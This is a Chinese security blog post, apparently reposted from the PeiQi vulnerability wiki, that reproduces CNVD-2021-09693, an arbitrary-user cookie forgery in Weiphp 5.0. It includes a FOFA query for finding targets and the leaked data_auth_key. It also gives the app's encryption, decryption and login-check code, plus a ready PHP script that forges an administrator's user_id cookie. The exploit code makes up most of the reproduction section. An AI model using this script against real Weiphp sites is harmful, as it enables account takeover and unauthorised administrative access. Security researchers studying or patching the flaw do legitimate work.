Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

  • A+
所属分类:代码审计 安全文章

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693


:漏洞描述🐑


Weiphp5.0 存在管理员用户Cookie伪造,通过泄露的密钥数据,可利用加密方法来得到管理员的Cookie


二:  漏洞影响🐇


Weiphp <= 5.0


三:  漏洞复现🐋

FOFA: app="WeiPHP"

首先需要得到数据库配置文件中的data_auth_key密钥

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

得到这个配置文件可参照上一篇Weiphp5.0 前台文件任意读取

'data_auth_key' => '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T'

全局查找下使用了这个密钥的地方

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

找到了跟据这个密钥的加密方法和解密方法

加密方法 think_encrypt

function think_encrypt($data, $key = '', $expire = 0){    $key = md5(empty($key) ? config('database.data_auth_key') : $key);
$data = base64_encode($data); $x = 0; $len = strlen($data); $l = strlen($key); $char = '';
for ($i = 0; $i < $len; $i++) { if ($x == $l) { $x = 0; }
$char .= substr($key, $x, 1); $x++; }
$str = sprintf('%010d', $expire ? $expire + time() : 0);
for ($i = 0; $i < $len; $i++) { $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256); } return str_replace(array( '+', '/', '=' ), array( '-', '_', '' ), base64_encode($str));}

解密方法 think_decrypt

function think_decrypt($data, $key = ''){    $key = md5(empty($key) ? config('database.data_auth_key') : $key);    $data = str_replace(array(        '-',        '_'    ), array(        '+',        '/'    ), $data);    $mod4 = strlen($data) % 4;    if ($mod4) {        $data .= substr('====', $mod4);    }    $data = base64_decode($data);    $expire = substr($data, 0, 10);    $data = substr($data, 10);
if ($expire > 0 && $expire < time()) { return ''; } $x = 0; $len = strlen($data); $l = strlen($key); $char = $str = '';
for ($i = 0; $i < $len; $i++) { if ($x == $l) { $x = 0; }
$char .= substr($key, $x, 1); $x++; }
for ($i = 0; $i < $len; $i++) { if (ord(substr($data, $i, 1)) < ord(substr($char, $i, 1))) { $str .= chr((ord(substr($data, $i, 1)) + 256) - ord(substr($char, $i, 1))); } else { $str .= chr(ord(substr($data, $i, 1)) - ord(substr($char, $i, 1))); } } return base64_decode($str);}


全局查看下使用了解密方法的地方

在文件 applicationcommon.php 中含有使用解密方法的代码,用于做身份验证

function is_login(){    $user = session('user_auth');    if (empty($user)) {        $cookie_uid = cookie('user_id');        if (!empty($cookie_uid)) {            $uid = think_decrypt($cookie_uid);            $userinfo = getUserInfo($uid);            D('common/User')->autoLogin($userinfo);
$user = session('user_auth'); } } if (empty($user)) { return 0; } else { return session('user_auth_sign') == data_auth_sign($user) ? $user['uid'] : 0; }}


根据这里得到的代码,可以知道当user_Id=1时,会解密密钥后判断是否正确,如果正确则可以登录系统

我们在本地使用加密代码加密user_id=1得到的cookie则可以登录系统

<?phpshow_source(__FILE__);function think_encrypt($data, $key = '', $expire = 0){    $key = '+0SeoAC#YR,Jm&c?[PhUg9u;:Drd8Fj4q|XOkx*T';    $key = md5($key);
$data = base64_encode($data); $x = 0; $len = strlen($data); $l = strlen($key); $char = '';
for ($i = 0; $i < $len; $i++) { if ($x == $l) { $x = 0; }
$char .= substr($key, $x, 1); $x++; }
$str = sprintf('%010d', $expire ? $expire + time() : 0);
for ($i = 0; $i < $len; $i++) { $str .= chr(ord(substr($data, $i, 1)) + (ord(substr($char, $i, 1))) % 256); } return str_replace(array( '+', '/', '=' ), array( '-', '_', '' ), base64_encode($str));}
echo 'user_id = ' . think_encrypt($_GET['user_id']);?>

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

添加cookie: user_id=xxxxxxxx即可成功登录

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693


获取密钥的方法参照公众号上一篇Weiphp5.0审计文章


 四:  关于文库🦉



    在线文库:

http://wiki.peiqi.tech


    Github:

https://github.com/PeiQi0/PeiQi-WIKI-POC

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693


最后

下面就是文库的公众号啦,更新的文章都会在第一时间推送在交流群和公众号

想要加入交流群的师傅公众号点击交流群加我拉你啦~

别忘了Github下载完给个小星星⭐


同时知识星球也开放运营啦,希望师傅们支持支持啦🐟

知识星球里会持续发布一些漏洞公开信息和技术文章~

Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693



由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


PeiQi文库 拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。



本文始发于微信公众号(PeiQi文库):Weiphp5.0 任意用户Cookie伪造 CNVD-2021-09693

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: